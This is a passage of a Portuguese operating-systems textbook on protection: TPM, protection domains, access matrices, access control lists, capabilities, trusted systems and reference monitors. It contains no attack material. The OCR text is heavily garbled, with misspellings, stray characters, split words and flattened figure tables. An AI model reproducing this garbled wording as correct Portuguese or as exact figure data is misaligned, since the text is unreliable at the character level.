mazenada no TPM pclo fabricante c rcvclada somente a 
alguns fabricantes de sistemas operadonais (como a Mi¬ 
crosoft, porexemplo), Assim, o TPM poderia limitar para o 
u su ario as opędes de software, trazendo somente as amoti- 
zadas pelo fabricante do computador. 

Os produtores de musi ca e filmes tambem gostam da 
ideia do TPM, ja que cle c capaz dc evitar a pirataria do 
comcudo que produzem. Ele tambem poderia abrir um 
novo modelo de ncgóriOs, como a possibilidade de a ługu cl 
de musieas e filmes por um prazo espealco e a recusa a su a 
decriptaęao uma vez que o prazo expirasse. 

Ha divcrsos outros usos para o TPM e nao temos es¬ 
paęo para tratar de todos eles aqui. O imeressante e quc 
uma das coisas quc esse proccssador nao faz c toinar os 
computadores menos vulneraveisa ataąues cxtcrnos. Seu 
foco c o uso da criptografia de forma a prevcnir que usua- 
rios realizem qualquer operaęao direta ou indiretamente 
nao autorizada por quem comrola o TPM. Um bom porno 
de panida para quem quiser saber mais sobre esse assunto 
e o anigo Trust ed computing, dtspomvel no sile Wiki pedla. 



Mecanismos de proteęao 


Ź facil ter um sistema seguro quando se dispóe de um 
modelo quc descreva o que deve ser protegido c quem tern 
permissao para fazer o que. Muitos trabalhosja foram rca- 
lizados nessa area, e nao ha como fałat dc todos eles aqui. 
Apresentaremos alguns modelos gerais c os mecanismos 
para reforęa-Ios. 


9.I.I I Dominios de proteęao 

Um sistema computacional conlem muitos 'objetos' 
qite predsam ser protegidos, Esses objetos podcm ser hard¬ 
ware (por exemplo, CPUs, segmentos de meinória, unida- 
des de disco ou impressoras) ou software (como processos, 
arquivos, bancos dc dados ou semaforos). 

Gada objęto tern um nonie unico pelo quai e referen- 
riado e um conjunto fi ni to dc operaęoes que os processos 
estao autorizados a ex ecu tar. As operaęoes read e write sao 
apropriadas a um arquivo; up c down fazem sen lido para 
um semafora, 

ć óbvio quc ć necessario havcr uma maneira de proibir 
que os processos lenham acesso a objetos aos quais nao es¬ 
tao autorizados, Alćm disso, esse mecanismo tambem dcvc 
possibilitar a restrięao de processos a um subconjunto dc 
operaęoes validas, ąuando for necessario. Por exemplo, o 
processo A pode ser amorizado a ler, mas nao a escrever 
no arquivo F. 

Para discutir diferentes mecanismos dc proteęao, c uli! 
imroduzir o conceito de dominio, Um dommio e um con¬ 
junto de pares (objetos, direitos). Gada par espedika um 
objęto e algum subconjunto das operaęoes quc podcm ser 
realizadas sobre cle. Um direito, nesse corHexto, significa 
a permissao dc realizar uma das operaęoes, Muitas vczes, 
um dommio corresponde a um unico usuario, indicando o 
que o usuario pode e nao pode la zer, mas pode tambem ser 
mais geral que apenas um usuario. Por exemplo, os inte- 
grantes dc uma cąuipc dc programaęao quc trabalhem no 
mesmo projeto podem pert en cer ao mesmo dommio para 
quc todos possana acessar os mesmos arquivos. 

A maneira como os objetos estao armazenados nos do¬ 
minios depende das dciinięocs com rclaęao a qucm prccisa 
saber o que. Um conceito basico, entretanio, e o de POLA 
(principle oj kart autko rity — principio da menor a u tor i da- 
de). De modo geral, a seguranęa hm eto na melhor quando 
cada um dos dominios possui somente a quantidade de ob¬ 
jetos e privilegios necessaria a realizaęao de seu trabalho e 
nada alem disso. 

A Figura 93 mostra tres dominios, com os objetos de 
cada dominie e os direitos (Leitura, Escrita, Execuęao) dis- 
ponfveis para cada objęto. Mole que a Impressora / esta em 
dois dominios ao mesmo tempo, com os mesmos direitos 
em cada dommio. O Arqtuvol tambem esta em dois domu 
nios, com direitos diferentes em cada um deies. 

A cada rnomento, cada proccsso cxccuta em algum 
dommio dc proteęao, Em oulras palavras, ba alguma cole- 
ęao de objetos a que ele pode ter acesso, e para cada objęto 
existe um conjunto de direitos. Os processos tambem po¬ 
dcm altcrnar entre os dominios durante a execuęao. As 
regras dc altcmanria entre dominios sao ba stanie depen- 
dentes do sistema, 
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Dominio 1 


Dominio 2 


Dominio 3 



1 Figura 9.3 Tres dominie® de protecao. 


Para tom ar a ideia de um dommio de proteęao mais 
concreta, observemos o UNIX (mcluindo Linux, FreeBSD 
c outros scmelhantes). No UN1X, o dommio dc um pro- 
ccsso e dcfinido por scu UID c GID. Quando um usuario 
se conccta, scu shdl obtćm o UID c o GID rant id os cm scu 
rcgistro no arqinvo de scnhas c des sao herdados por todos 
os seus fithos, Dada qualqucr combinaęao (UID, GID), e 
possfvel fazer u ma lista completa dc todos os objetos (ar- 
quivos, inclusive os dispositiyos de E/S representados pelos 
arquivos especiais etc.) que podem ser acessados e se eles 
podem ser acessados para leitura, escrita ou execuqao. Dois 
processosrama mesma combinaęao de valores (UID, GID) 
lerao acesso a exatamente o mesmo conjunto dc objetos. 
Processos ram valores (UID, GID) diferentes terao accsso 
a um conjunto difereme de arquivos, embora possa havcr 
urna sobrcposięao ransideravd. 

Alem disso, cada processo no UNIX tern duas part es: a 
parte do usuario e a parte do nudeo. Quando o processo 
faz u ma cha mada de sistema, cle chaveia da parte do usuario 
para a parte do nucleo. A parte do nucleo tern acesso a um 
conjunto de objetos difereme daąuele da parte do usuario. 
Por cxemplo, o nucleo pode ter accsso a todas as paginas na 
memória ffsica, a todo o disco e a todos os outros recursos 
protegidos. Portanto, uma chamada de sistema ocasiona 
um chaveamento de dommio. 

(juando um processo faz uma chamada exec em um 
arquivo com o bit SETUID ou o bit SETCID ligado, ele 
adquire um novo UID ou GID efetivo. Com uma combina- 
ęao (UID, GID) diferente, ele tein um conjunto de arquivos 
e opcraęócs dtspomvcis tambem diferentes. Executar um 
programa com o SETUID ou com o SETGID ligados tam¬ 
bem leva a uma aliernanda de domfnios, pois os direitos 
disponi'veis mu dam. 


Uma ąuestao importante e como o sistema comrola 
quais objetos pertencem a quais domfnios* Pelo menos 
eonceimalmerue, alguem pode yisualizar uma grandę ma¬ 
li iz, com as linhas representando domfnios e os objetos 
representados pelas colunas. Cada caixa rełaciona os direi¬ 
tos — se hoiwer — que o dommio contein para o objęto. 
A matriz da Figura 9.3 e mostrada na Figura 9.4. Dados 
essa matriz e o nu mero do dominio a mai, o sistema pode 
informar se 6 permitido o accsso a um da do objęto, de um 
modo parlicular, e de um dominio espedfico. 

A própria aliemanria entre domfnios pode ser facil- 
mente inelmda no modclo da matriz, presumindo o pró- 
prio dominio como um objęto e com a operaęao enter. A Fi¬ 
gura 9,5 mostra novamente a matriz da Figura 9.4, só que 
agora com os tres domfnios como objetos. Os processos no 
dommio j podem a Ile rn ar para o dommio 2, mas, uma vez 
la, eles nao podem voltar. Essa situaęao modela a execuęao 
de um programa com o SETUID liga do no UNIX, Nenhuma 
ontra alternancia de dommio e permitida nesse exemplo. 

9.3.21 Listas de controle de acesso 

Na pratica, o annazenaniemo rcal da matriz da Figura 
9.5 raramente ocorre, pois ela e muito grandę e esparsa. A 
maioria dos domfnios nao tern acesso a malaria dos obję¬ 
łoś, portanto, armazenar uma matriz muito grandę e com 
a maior parte de seus elementos vazia e um desperdfcio de 
espaęo. Dois metod os praticos, comudo, sao o annazena- 
mento da matriz por linhas ou por colunas, armazenando 
someme os elementos que nao sao vazios. As duas abor- 
dagens sao siirprecndentemente diferentes. Nesta $eęao r 
estudaremos o annazena mento por colunas e, na próxima, 
o armazenamento por linhas* 


Objęto 


Dominio 

1 

Arquivo1 

Arquivo2 

Arquivo3 

Arquivo4 

Arquivo5 

Arquivo6 Impressoral 

Plotter2 

Leitura 

Leitura 

Escrita 







2 



Leitura 

Leitura 

Escrita 

Execuęao 

Leitura 

Escrrta 


Escrita 


3 






Leitura 

Escrita 

Execuęao 

Escrita 

Escrita 


1 Figura 9.4 Uma matriz de proteęao. 
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Objęto 

Arquivo1 Arquivo2 Anquivo3 Arquivo4 Arquivo5 Arquivo6 Impressoral P lotto r2 Dominie 1 Dominio2 Dominio3 


Loitura 

Leitura 

Escrita 








Entra 




Leitura 

Leilura 

Escrita 

ExecaęIo 

Leitera 

Escrita 


Escrita 










Leitura 

Escrita 

Execitęao 

Escrita 

Escrita 





1 Figura 9.5 Unia matriz de proteęao com dominios como objetos. 


A primeira tecnica consiste em assodar a cada objęto 
uma lista (ordcnado) com todos os domfnios capazcs de ter 
acesso a o objęto e como podem fazę do. Essa lisia e cha ma¬ 
da de lista de controle de acesso ou ACL (dims mitro! 
list) e csli Hustrada na Figura 9.6, .Nesse easo, vcmos tres 
processos, cada lim pertencente a um domtnio difcrcnte: 
A, B e C e tres arquivos Fl f F2 e F3. Para simplilkar, prosu- 
miremos que cada dominio corresponde a exatamente um 
usuario — nesse caso, os usuarios A, B e C Muitas vezes, 
na literatura sobre seguranęa, os usuarios sao chamados de 
sujeitos ou prindpais, para contrasta-los com as coisas 
possufdas, isto e, os objetos, como os arquivos, 

Cada arquivoapresenta uma ACL assodada a ele. O ar- 
quivo FI tem duas entradas em sua ACL (separadas por um 
ponto c vfrgula). A primeira cntrada mostra quc qualqucr 
processo possufdo pclo usuario A pode ler e escrever no 
arquivo, Asegunda cntrada mostra que qualqucr processo 
possufdo pclo usuario B e capaz dc ler o arqmvo. Todos os 
outros acessos desses usuarios e todos os acesso s de outros 
usuarios sao proibidos. Notę quc os direitos sao outorga- 
dos pelo usuario, e nao pelo processo. No que diz respeito 
ao sistema de proteęaa qualquer processo possuido pelo 
usuario A pode ler e escrcvcr no arquivo FI. Nao imporia 
se ha um ou ccm processos* 0 quc interessa e o propricta- 
rio e nao o ID do processo. 


O arquivo F2 tern tres entradas cm sua ACL: A t B c C 
podem ler o arquivo e, alem disso, B tambem pode escrever 
neic, Ncnhtmi outro acesso e permitldo, O arquivo F3 ć 
aparememente umprogmma exccmavcl, pois Be Cpodem, 
ambos, ler e executa-lo. B pode tambem escrever nele, 

Esse exemplo Uustra o modo mais basico dc prote- 
ęao por ACLs. Na pratica, exisiem muitos outros sistemas 
mais sofislicados. Para comeęar, rnostramos somente tres 
direitos ate agora: Lei tura, escrita e execuęao. Ainda pode 
haver direitos adicionais. Alguns desses direitos podem ser 
generieos — isto e, apJicados a todos os objetos e outros 
podem ser eśpecfficos a algum objęto* Exemplos de direitos 
generieos sao destroy object e copy objęci Esses direitos po- 
deriam servir para q na lquer objęto, nao importami o dc quc 
tipo fosse. Emre os direitos espectficos a um objęto podem 
csiar append message para um objęto caixa de correio c sort 
alphabetlcally para um objęto di retorto. 

Ale agora, todas as entradas da ACL foram para usuarios 
i.ndividuais* Muitos sistemas suporiam o conceito dc grupo 
de usuarios. Os gnipos tem nomes e podem ser mduuios 
nas ACLs, Duas variaędes sao possfms na semantica de gru- 
pos. Em alguns sistemas, cada processo tern urn ideniificador 
(ID) de usuario (UID) e um identiflcador de grupo (GID). 
Para esses sistemas, uma cntrada da ACL e da forma 

UID1, GID1: direitos 1; UID2, GID2: direitos2;... 



Espaęo 
> do 
usuario 


, Espaęo 
xio nucleo 


] Figura 9,6 Uso de listas de controle de acesso no gerenciannento de acesso aos arquivos. 
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Sob essas condięoes, quando o acesso a Lim objęto e 
requisitado, e feita urna veriticaęao usando o LUD e o GID 
de quemreqiusitou. Se eles estiverem presentes na ACL, os 
direltos apresentados estarao disponiveis. Se a combinaęao 
(UID, GID) nao estivcr na lista, oaccsso nao sera pcrmitido. 

Usar gmpos dessa maneira introduz efetivamente o 
conceito de papel. Considere uma instalaęao na qual Ana 
e a adnimistradora do sistema e que, portanto, pertence 
ao grupo sysadm. Contudo, suponha que a empresa tam- 
bem tenha alguns clubes de fundonarios e que Ana seja 
um mcmbro do dube dos criadores de pombos. Os mem- 
bros do dubc pertencem ao grupo crdpmh c tein acesso 
a os eomputadores da empresa para gerenda r o banco de 
dados de pombos, Uma parte da ACL pode ser most rada 
na Tabela 9.2* 

Se Ana lentar obter acesso a um desses arquivos, o re- 
sultado dependera do grupo ao qual da esta atualmente 
co ne eta da. Quando da acessa o sistema, este Ihe pede para 
escolher qua! dos gmpos da qucr usar, ou pode ate mes- 
mo ter nomes dc entrada diferentes c/ou senhas diferentes 
para mante-los separados. O objęlivo desse esąucma ć im- 
pedir que Ana tenha acesso ao arquivo dc senhas enąuanto 
ela estiver assumindo a funęao de criadora de pombos, Ela 
$ó pode faze-lo ąuando estiver conectada como administra- 
dora do sistema. 

Hm alguns casos, um usuario pode ter acesso a cer- 
los arquivos> mdependememente do grupo a quc de esta 
atualmente conectado. Esse caso pode ser tratado intro- 
du/indo-se earacteres-chave, que valem para lodos. Por 
exemplo, a entrada 

ana, *; RW 

para o arquivo de senhas darta acesso a Ana, nao impor- 
lando a qual grupo da estivessc atualmente conectada. 

Outra possibilidadc ainda ć a seguinie: se um usuario 
pertence a qualquer grupo que tenha dircitos de acesso, o 
acesso e pcrmitido. Nesse caso, um usuario pertencente a 
mńliiplos grupos nao precisa especificar qual grupo usar no 
momcmo do acesso ao sistema. Todos os scus dircitos sao 
validos a lodo momento. Urna dcsvantagem dessa estra- 
tegia e que da ofercce rnenos encapsuiamcmo: Ana pode 
edilar o arquivo de senhas durante uma rcuniao do dube 
de criadores de pombos. 

O uso dos grupos c de caracteres-chave introduz a pos- 
sibitidade dc bloqucar sekii va menie o acesso de um usua- 
rio espeeffko a um arquivo. Por exempIo, a entrada 

yirgilio, *: (nonę); *, *: RW 


Arquivg 

Lista de controle de acesso 

Senha 

ana, sysadm: RW 

Dados^pombos 

bilh crdpmb: RW; ana, crdpmb: RW; ... 


1 Tabela 9.2 Duas listas de controle de acesso. 


da acesso a leitura e escrita de arquivos ao mundo intei- 
ro, rnenos a Virgflio. Isso fundo na porque as entradas sao 
percorridas na ordem c as primeiras que se aplicam sao to- 
madas; as entradas subsequentes nao chegam nem a ser 
vcrificadas. Uma combinaęao ć cncontrada para Virgilio na 
primcira entrada e os dircitos dc acesso — nesse caso, (ne- 
nhum) — setao achados c aplicados. A busca termina nesse 
ponto, O fato de o restante do mundo ter acesso nem chega 
a ser verificado, 

A outra maneira de iidar com grupos e nao ter entra¬ 
das ACL como pares (UID, GID), mas sini ter cada entrada 
como sendo um U1D ou um GID, Por exempIo, uma entra¬ 
da para o arquivo dados_ pombos poderia ser 

debo ra: RW; felipe: RW; crdpmb: RW 

c isso significaria que Debora, Felipe o todos os membros do 
grnpo crdpmb icriam acesso a leitura c a escrita do arquivo. 

Algumas vezesaconiece de o usuario — ou de um gru¬ 
po — ter cerlas permissoes cm relaęao a um arquivo que o 
proprietario do arquivo d esej a, depois, revogar. Para a lista 
de comrole de acessos, e rclatwamente simples revogar um 
acesso previamente airibmdo. Tudo o que deve ser feito 
e edilar a ACL e fazer a mudanęa. Contudo, se a ACL for 
yeriltcada sorneme quando urn arquivo e aberio, e prova- 
vcl que a mudanęa somente tenha efeito para as chamadas 
futuras de open. Qualquer arquivo ja aberio cominuara a 
ter os dircitos que dciinha quando foi aberio, mcsino que o 
usuario nao esteja mais autorizado a ter acesso ao arquivo. 

9.3.31 Capacidades 

O outro modo de percorrer a matriz da Figura 9.5 e por 
iinhas. Quaiido esse metodo e usado, assodada a cada pro- 
cesso esta uma lista de objetos aos quais se pode ter acesso, 
com uma indicaęao de quais operaęoes sao permilidas para 
cada um ddes — em outras palavras, seu dommio. Hssa 
lisia e chama da de lista de capacidades ou C-list c cada 
um de sens itens e denominado capacidade (Dennis e Van 
Horn, 1966; Fabry, 1974). Um conjunto de tres processos e 
suas listas de capacidades e ilustrado na Figura 9.7, 

Cada capacidade gara me ao proprietario certos dircitos 
sobrc um certo objęto. Na Figura 9,7, o processo possuido 
pelo usuario A pode łer os arquivos FI e F2 ( por exemplo. 
Normalmente, urna capacidade consiste em um idemifi- 
cador dc arquivo (ou, mais gen erka men te, um objęto) e 
um mapa dc bits para os varios dircitos. Em um sistema do 
tipo UNIX, o idciilificador dc arquivo seria provavelmentc 
o mimem do i-node. As listas de capacidades sao objetos 
propriamente di los e podeni ser apontadas e apontar ou¬ 
tras listas de capacidades, facilitando, assim, o compartilha- 
mento de subdomfnios. 

E evidente que as listas de capacidades dcvem ser pro- 
tegidas de adulteraęao por u su a ri os. Sao eon h cci dos tres 
me todos de proteęao. O primeiro requer uma arquitetura 
rotulada {łagged mkitecture), um projeto de hardware no 
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I Figura 9,7 Quando as capacidades s&o uiizadas, cada processo possui urna lista de capacidades. 


qual cada palavra dc me mona Lem um bil cxtra (ou rótulo) 
quc indka sc a palavra conlćm ou nao urna capacidade. 
O bil dc rólulo nao e usado por imiruęocs arilmelicas, dc 
tomparaęoes ou similares, c só pode ser modificado por 
pr ogra mas que executem no modo nudeo (isto e, o siste- 
ina operadonal). Maąuinas de arquitetura rotulada ja fo¬ 
rami constrmdas e podem fundonar bem (Feustal, 1972), O 
IBM AS/400 e um cxemplo popular. 

A segunda maneira consiste em manier a C-list den¬ 
im do sisiema operadonal. As capacidades sao, entao, re- 
ferenciadas por suas posięoes na lista de capacidades. Um 
processo pode dizer: "Leia 1 KB do arquivo apontado pela 
capacidade 2\ Bssa forma de endercęamento e semdhante 
ao liso dos descritores de arquivos no UN1X. O Hydra (Wulf 
ct al., 1974) fundonava desse modo. 

A terceira maneira e maniera C-list no espaęo do usua¬ 
rio, porem gerenciando as capacidades cript og ra fi ca me ni e, 
pois assim os usuarios nao pod era o adultera-łas. Hssa abor- 
dagem e particularmente adequada para sistemas distribuf- 
dos e funciona do seguinte modo. Quando um processo 
dicme envia uma mensagem a um servidor remoto (um 
scrvidor de arquivos, por cxcmplo) para quc crie um objęto 
para cle, o senddor cria o objęto c gera um nu mero aleató- 
rio iongo — o ca nipo dc vcrifkaęao —, para que va jurno 
com o objęto. Uma vaga na tabela de arquivos do seryidor 
e reservada ao objęło e o campo de verificaęao e armazena- 
do la com o endereęo dos blocos de disco etc. No UNlX, o 
campo de verifieaęao e armazenado no seryidor, no i-node. 
Ele nao e eiwiado de volta ao usuario e nunca trafega pela 
rede. O seryidor, en tao, gera e reiorna a capacidade para o 
usuario na forma mostrada na Figura 9.S. 

A capacidade retornada ao usuario centem o idenii- 
ficador do seryidor, o numero do objęto (o fndice nas ta- 


| Seryidor 

Objęto 

Direitos 

f (Objetos, Direitos, Yerificaęao) 


I Figura 9.6 Uma Lista de capacidades criptograficamantę 
protegida. 


bdas do seryidor, essenrialmenie o numero do l-node) c 
os direitos, annazenados como um mapa de bits. Para um 
objęto recentememe criado, todos os bits de direitos sao 
ligados. O ultimo campo e o valor resultante da fiuięao de 
sentido unico crlptograficamente segura,/, sobre a conca- 
tcnaęao dos campos dc objęto, direitos e verificaęao. Essa 
funęao /e do lipo quc dfsciitimos ameriormente. 

Quando o usuario deseja ter acesso ao objęto, cle en via 
a capacidade ao seryidor como parte da requisięao. O servi- 
dor r entao, extrai o numero do objęto para indexar em suas 
ta bel as e encomrar o objęto. Ele entao ca kula/ [Objęto f Di¬ 
reitos, Veńj\caęm) t tom a n do os dois primeiros parametros da 
própria capacidade e o terceiro de suas próprias ta bdas. Se 
o resultado for igual ao do ąuarto campo da capacidade, a 
reqmsięao sera cumprida; caso contrario, sera reje!lada. Se 
um usuario tentar ter acesso a algum objęto de algum ou- 
tro usuario, de nao sera capaz de fabricar o ąuarto campo 
eon etanie nie, pois nao eon hece o campo de yerifkaęao e, 
assim, a reąuisięao sera rej dta da. 

Um usuario pode pedir ao seryidor para pi od uzi r uma 
capacidade mais fraca — por exemplo, de acesso apenas 
para leitura. Primeiro o servidor verifica se a capacidade 
e valida. Se for, ele ca kula/ (Objęto, N ovos_dire.it os f Ye.ńjka- 
ędo) e gera uma nova capacidade colocando esse va!or no 
ąuarto campo. Notę quc c usado o valor original de Vm- 
ficaęao, pois as outras capacidades, a leni dessa, dependent 
desse vaior. 

Essa nova capacidade ć enviada de volta a o processo 
rcquisitante. O usuario pode, agora, entregar essa capari- 
dadc a urn amigo, eiwiando-a cm unia mensa gem. Sc o 
amigo ligar os bits de direitos que deveriam estar desliga- 
dos, o servidor deteetara isso ąuando a capacidade for usa- 
da, pois o valor de/nao correspondera ao campo falso de 
direitos. Como o amigo nao conhece o campo de vetifica- 
ęao real, ele nao e capaz de fabricar unia capacidade quc 
corresponda aos Falsos bits de direitos. Esse esąuema fol de¬ 
seń volvido para o sisierna Amoeba e usado extensivamente 
(Tanenbaum ct al„ 1990). 
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Alem dos direitos especfficos dependemes do objeio, 
como capacidades de ler e executar, as capacidades (lamo 
no nikle o ąnanto eriptograficamente protegkla) normal¬ 
nienie aprcscntam direitos genericos aplicaveis a todos 
os objctos. Exemplos desses direitos sao; 

1. Copiar capacidade: cria uma nova capacidade para o 
mcsmo objęto, 

2, Copiar o objęto; cria um objęto duplicado com uma 
nova capacidade. 

3, Reinover capacidade: remove uma enirada da C- 
-list; o objęto nao ć afctado, 

4. D estru i r o objęto; reniove permanenteniente um 
objęto e uma capacidade. 

Um ultimo comentario que merece desiaąue sobre os 
sistemas de capacidade e que a revogaęao do acesso a um 
objęto e muiio dificil na versao gerenciada peio nudeo. E 
compjicado para o sistema e n contra r todas as out ras capa¬ 
cidades de qualquer objęto para depois recuperadas, pois 
elas podem estar annazenadas em C-łists por todo o disco. 
Uma soluęao e ter cada capacidade aport tando para um 
objęto indireto e nao para o próprio objęto. Com o objęto in- 
direto apontado para o objęto real, o sistema pode romper 
essa conexao, invalidando, assim, as capacidades. (Quando 
uma capacidade do objęto indireto e apresemada ao siste¬ 
ma depois, o usuario descobre que o objęto indireto esta 
apontando para um objęto nulo,) 

No esquema do Amoeba, a revogaęao € facil Só e 
preciso mudar o campo dc ycrificaęao armazenado com 
o objęto. Em um instamc, todas as capacidades existcntcs 
sao iiwalidadas. Contudo, nenhum esąuema perntite uma 
revogaęao selctiva, isto c, tom ar de voiia — por exemplo, 
a perrnissao de Joao e a de ninguem mais. Esse defeito ge- 
ralmente e reconhecido como um problema de todos os 
si stem as de capacidade. 

Um outro problema geral consiste em assegurar-se de 
quc um proprieiario de uma capacidadc valida nao de mm 
cópla dela a mil dc scus amigos. Com o nudeo presu mi li¬ 
do o gerenciamento das capacidades, como no Hydra, esse 
problema fica resoMdo, mas essa soluęao nao fundona 
intiito bem em um sistema distribuido, como o Amoeba. 

Bastante resumidamenie, as ACLs e as capacidades leni 
propriedades complementares, As capacidades sao muito 
eficienies, pois, se um processo diz "Abra o arquivo aport- 
lado pela capacidade 3\ nao se faz necessaria qualquer 
yerificaęao. Para as ACLs, pode ser necessaria uma busca 
(potencialmente loega) da ACL. Se nao houver suporte a 
grupos, entao gara mir a todos o acesso a leitura de um ar- 
quivo vai rcąuerer a enumeraęao de todos os usuarios que 
cstivcrcm na ACL. As capacidades tambem permitem puc 
um processo seja farilmentc encapsulado; as ACLs, nao. 
Por outro lado, as ACLs permitem a rcvogaęao sdetiva dos 
direitos, mas as capacidades, nao. Por firn, se um objęto for 
removido e as capacidades nao o forem ou se as capacida¬ 


des forem removidas e um objęto nao, surgirao problemas. 
As ACLs, porem, nao apreseniam esse problema. 

9.3.41 Sistemas confiaveis 

Lemos sobre virus, vermes e outros problemas a todo 
instarue nos jornais. Urna pessoa ingenua logi ca me me 
pode formular duas ąuestoes sobie esse esiado de coisas; 

1. £ possfvel construir um sistema computacional se* 
guro? 

2. Se e posswel, por que isso nao e feito? 

A resposta a primcira questao c basicamente sim. Ha 
varias dćcadasja sc sabc como construir um sistema seguro, 
O MULTICS, projelado nos a nos 1960, por cxempJo, tcvc a 
seguranęa como seu priucipal objetivo c se saiu muito bem, 

O motivo pelo qual os sistemas seguros nao estao sen- 
do construfdos e mais complexo, mas existem duas razóes 
fundamentais. Primeiro, os sistemas atuais nao sao segu- 
ros, mas os usuarios sc recusam a dcixa-los dc lado. Sc a 
Microsoft anunciassc ter, alem do Windows, um novo pro- 
duto, o SccurcOS, garantidamente imune aos vfms, mas 
que nao executasse as aplicaęoes Windows, difkilmente 
as pessoas e as empresas jogariam o Windows no lixo e 
comprariam o novo sistema imediatamente. Na verdade, a 
Microsoft ja possui urn sistema operacional seguro (Fandri- 
ch et al. f 2006), mas nao o comerrializa. 

A segunda razao c mais sutiL O linico modo dc cons- 
tmir um sistema seguro c fazc-lo simplcs. Os rccursos do 
produto sao inimigos da seguranęa. Os projclistas dc sis- 
temas creem fcorretamente ou nao) que o que os usua¬ 
rios ąuerem e um numero maior de caracterrsticas. Mais 
caracterisiicas significam mais complexidade, mais código, 
mais falhas e mais erros de seguranęa. 

Eis dois cxemplos simples. Os primeiros sistemas dc 
corrcio detrónico enviavam mensagens como tcxto ASCII, 
Eles eram completamcnte seguros, Uma mensagem ASCII 
nunca poderia danifkar um sistema computacional. Entao, 
as pessoas tiveram a ideia de expandir o correio eletronico 
para induir ouiros tipos de documentos, como, por exem- 
plo, arquivos Word, que podem conter pro gra mas na forma 
dc macros. Ler esse documento signrfica executar algom 
outro programa em sen computador. Nao iniporta ąuantas 
caixas de a tein {sandboxe$} forem usadas: execuiar um pro- 
grama cxtcrno em sen computador e inerentemente mais 
perigoso quc ler um tcxto ASCII. Os usuarios cxigiram a 
capacidadc dc mudar as mensagens dc corrcio detrónico 
dc documentos passivos para programas alivos? Prova- 
vdmente nao, mas os projetistas de sistemas acha ram isso 
uma boa ideia, sem se preocuparem muito com as implica- 
ęoes sobre a seguranęa. 

O segundo cxemplo ć o mesmo, só quc para paginas 
da Web, Ouando a Web consistia apenas cm paginas HTML 
pa$sivas, da nao apreseiitava maiores problemas dc segu¬ 
ranęa. Agora quc niuitas paginas da Web contem progi a- 
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mas (applets) que o usuario e obrigado a executar para vi- 
sualizar o conteudo, surge urna falha de seguranęa após a 
outra. Logo que oma e reparada, outra a eon tece. Quando 
a Web era totalmente estatica, os usnanos pegarain era ar- 
mas reivindicando contciidos di na mi cos? Nao qtie o autor 
sc Icmbrc, mas esse tipo dc inovaęao trouxe a rcboquc os 
problemas dc seguranęa. Parccc quc o vice-presidcntc-en- 
carregado-de-dizcr-nao cstava dormindo ao volante. 

Realnienie, ha algumas orgamzaęoes que acreditam 
que a seguranęa e mais import a me do que elegant es ca- 
racteristicas novas — as organizaęoes militares sao o pri- 
meiro excmp!o delas. Nas próximas scęócs, estudarcmos 
algnns dos lópicos cnvolvidos, mas des podem ser resumi- 
dos cm urna sentenęa: para construir urn sislcma seguro, 
devc cxistir urn modela dc seguranęa, no mleko do sislc¬ 
ma operacional que seja simpks o basta nie para que pro- 
jetistas possani realnienie emertde-Io e resistira pressao de 
deiurpa-lo para adicionar novas ca racteristicas. 

9.3-51 Base computacional confiavel 

No mu udo da seguranęa, as pcssoas muitas vczes falam 
sobre sistemas confiaveis em vcz de falar de sistemas se- 
guros. Sistemas confiavris sao aqudes nos quais os requi- 
sitos de seguranęa sao formalmente estabeleddos e aim- 
pridos. No cenie de todo sistema conftavel esta u ma TCB 
(trusted computing base — base computacional confiavel) mi¬ 
nima, composta pclo hardware c pclo software necessarios 
para gara mir todas as regras de seguranęa. Se a base com- 
pulacional -conliavel estirer de acordo coiri a especillcaęao, 
a seguranęa do sistema nao podera esiar compromeltda, 
independcmernemc do que esteja er rado. 

A TCB consistc, cm geral, dc grandę parte do hardware 
(cxccto os dispositivos dc E/S que nao afetam a seguran¬ 
ęa), alem dc u ma parte do nucleo do sistema operacional 
e a maioria o u a totaiidade dos progi a mas do usuario que 
liverem poderes dc superusuario (por exemp)o, programas 
com SETUiD de superusuario no UNIX). Entre as funęoes 


do sistema operacional que devem fazer parte do TCB es- 
lao a criaęao dc protessos, o chavcamcnio dc processos, o 
gerenciamento do mapa de memória e parte do gerencia- 
mento de arquivos e de E/S. Em umprojeto seguro, muitas 
vezes a TCB fica totalmente separada do restante do siste¬ 
ma operacional, com o intuito de minimizar sen tamanho 
c verificajr sua correęao, 

Urna parte import aule da TCB c o monitor dc refe¬ 
renda, eon formę mostra a Figura 9.9. O monitor dc re¬ 
ferencja aceita todas as chamadas de sistema que envolvcm 
seguranęa — como a aberiura de arquivos — e decide se 
elas devem ou nao ser processadas. O monitor de referen¬ 
da, desse modo, permile que todas as decisoes de segu¬ 
ranęa scjam colocadas cm um local, sem quc seja possivcl 
desviar-se dele. A maioria dos sistemas operacionais nao e 
projetada dessa maneira — o que e parte da razao de eles 
serem tao inseguros. 

Um dos objetivos dc algumas pesquisas atu ais na circa 
dc seguranęa e diminuir a base computacional eon fi a vd 
de milhdcs de linhas de código para somente dezenas de 
milhares de linhas de código. Na Figura 1.23, vimos a 
estrutura do sistema operacional jMTNIX 3, que seguc os 
padroes do POSIX, mas com urna estrutura ra di cal menie 
diferente da do Linux o u do FreeBSD* No MINtX 3, so- 
mente cerca de quatro mil linhas de código sao executadas 
no modo nucleo. Todo o resto funciona como um conj un¬ 
io de processos do usuario, Alguns deles, como o sistema 
de arquivos e o gcrenciador dc processos, fazem parte da 
base computacional confiavel, ja que podem faci) menie 
comprometer a seguranęa do sistema. Outras partes, en- 
tretanto, como os drivers de impressora e de audio, nao 
integram a base computacional confiavcl porquc, indc- 
pendentemente do que aconteęa com das (mesmo quc 
sejam tomadas por um vfrus), a seguranęa do sistema mo 
e comprometida. Com a reduęao da base computacional 
confiavcl em duas ordens dc magniuide, sistemas como o 
jMIN 1X 3 podem poiencialmente oferecer urna seguranęa 
maior do que os projetos tradicionais. 


Procesjo do usuśfio 



Todas as chamadas de sistema passam 
pelo monitor de referenda para venficar 
a seguranęa. 
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Base computacional confidvei 


Nucleo do sistema operacional 
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1 Figura 9,9 Um monitor de referenda. 
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9.3,61 Modelos forma is de sistemas segu ros 

As matrizes dc proteęao, como aąuclas da Figura 9.4, 
nao sao estaticas. Elas mu dam com freąuencia, dc acordo 
com a criaęao dc objetos, com a destruięao de velhos ob* 
jetos c a incdida que o proprietario decide aumemar ou 
reslringir o conjunto de usuarios para sens objetos. Mul¬ 
ta alcnęao Leni sido voltada a modelagcm de sistemas de 
proteęao nos quais a ma tri z dc proteza o esicja mudando 
consiantemente, No restante dcsta seęao, falarcmos breve- 
mcnie sobre alguns desses trabalhos. 

Ha decadas, Harrison et al. (1976) idemificaram seis 
